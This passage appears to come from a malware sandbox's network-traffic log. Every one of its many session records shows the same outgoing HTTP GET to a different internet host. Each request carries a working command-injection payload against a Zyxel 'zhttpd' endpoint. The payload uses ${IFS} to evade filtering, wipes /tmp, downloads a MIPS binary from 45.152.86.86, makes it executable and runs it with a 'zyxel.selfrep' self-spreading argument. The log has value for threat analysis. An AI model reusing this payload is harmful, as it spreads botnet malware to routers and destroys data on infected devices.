                                        Mar 31, 2024 09:20:53.527715921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2650192.168.2.235674239.126.241.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527798891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2651192.168.2.233983494.174.93.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527863026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2652192.168.2.2336738209.239.38.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.527935028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2653192.168.2.234520479.56.143.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528019905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2654192.168.2.235776482.251.80.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528098106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2655192.168.2.235190490.13.99.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528161049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2656192.168.2.2333992222.49.88.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528213978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2657192.168.2.235735452.63.60.173443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528305054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2658192.168.2.23375389.209.28.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528379917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2659192.168.2.234741063.97.180.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528429985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2660192.168.2.2358902136.52.148.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528487921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2661192.168.2.234707062.13.229.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528565884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2662192.168.2.2353532163.108.186.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528623104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2663192.168.2.2348984190.181.33.83443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528692961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2664192.168.2.2360902193.122.254.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528776884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2665192.168.2.2355496216.128.230.27443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528839111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2666192.168.2.2343240186.137.227.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528898001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2667192.168.2.233406413.137.201.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.528965950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2668192.168.2.2335598210.127.59.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529038906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2669192.168.2.2333616121.198.75.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529114008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2670192.168.2.235836847.232.96.192443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529160023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2671192.168.2.2344802161.247.1.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529222012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2672192.168.2.2352116203.248.29.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529294014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2673192.168.2.2349056148.224.27.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529346943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2674192.168.2.2338376121.139.126.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529408932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2675192.168.2.2340648137.83.222.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529484987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2676192.168.2.2346880132.24.86.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529534101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2677192.168.2.234045488.54.18.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529603958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2678192.168.2.2353666123.48.164.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529687881 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2679192.168.2.23425022.7.93.191443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529723883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2680192.168.2.235294297.130.57.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529786110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2681192.168.2.2348976159.124.99.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529831886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2682192.168.2.23586908.158.50.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529896021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2683192.168.2.2347568105.148.138.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.529985905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2684192.168.2.2355330105.0.27.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530035019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2685192.168.2.2334884105.105.95.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530112028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2686192.168.2.235063874.56.91.85443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530189037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2687192.168.2.235564052.153.164.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530255079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2688192.168.2.2334664195.74.223.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530313969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2689192.168.2.2350894194.130.39.108443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530412912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2690192.168.2.234272080.45.3.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530479908 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2691192.168.2.2359490162.220.236.201443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530570030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2692192.168.2.2333802188.29.151.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530613899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2693192.168.2.2358080218.251.5.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530689001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2694192.168.2.235858820.58.243.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530755997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2695192.168.2.2349362189.172.45.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530827045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2696192.168.2.234408666.191.65.30443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530906916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2697192.168.2.234697623.12.16.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.530971050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2698192.168.2.233306064.148.188.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531040907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2699192.168.2.2342370191.69.211.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531091928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2700192.168.2.2353230159.179.153.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531161070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2701192.168.2.233335044.15.197.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531219959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2702192.168.2.2341462167.134.108.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531311989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2703192.168.2.2355720209.117.56.79443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531375885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2704192.168.2.233282294.166.187.33443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531445026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2705192.168.2.2340002217.211.125.184443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531527042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2706192.168.2.233989247.235.40.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531577110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2707192.168.2.2341198105.233.143.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531651020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2708192.168.2.2351342119.159.11.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531718969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2709192.168.2.234850683.125.18.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531796932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2710192.168.2.2359452198.194.33.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531842947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2711192.168.2.2339704193.235.249.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531927109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2712192.168.2.235479485.189.80.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.531985044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2713192.168.2.2358326216.166.216.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532084942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2714192.168.2.234608625.241.3.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532135963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2715192.168.2.2345404202.29.95.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532206059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2716192.168.2.234821248.4.165.54443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:53.532279015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        2717192.168.2.2346052186.129.254.24443
                                        TimestampBytes transferredDirectionData
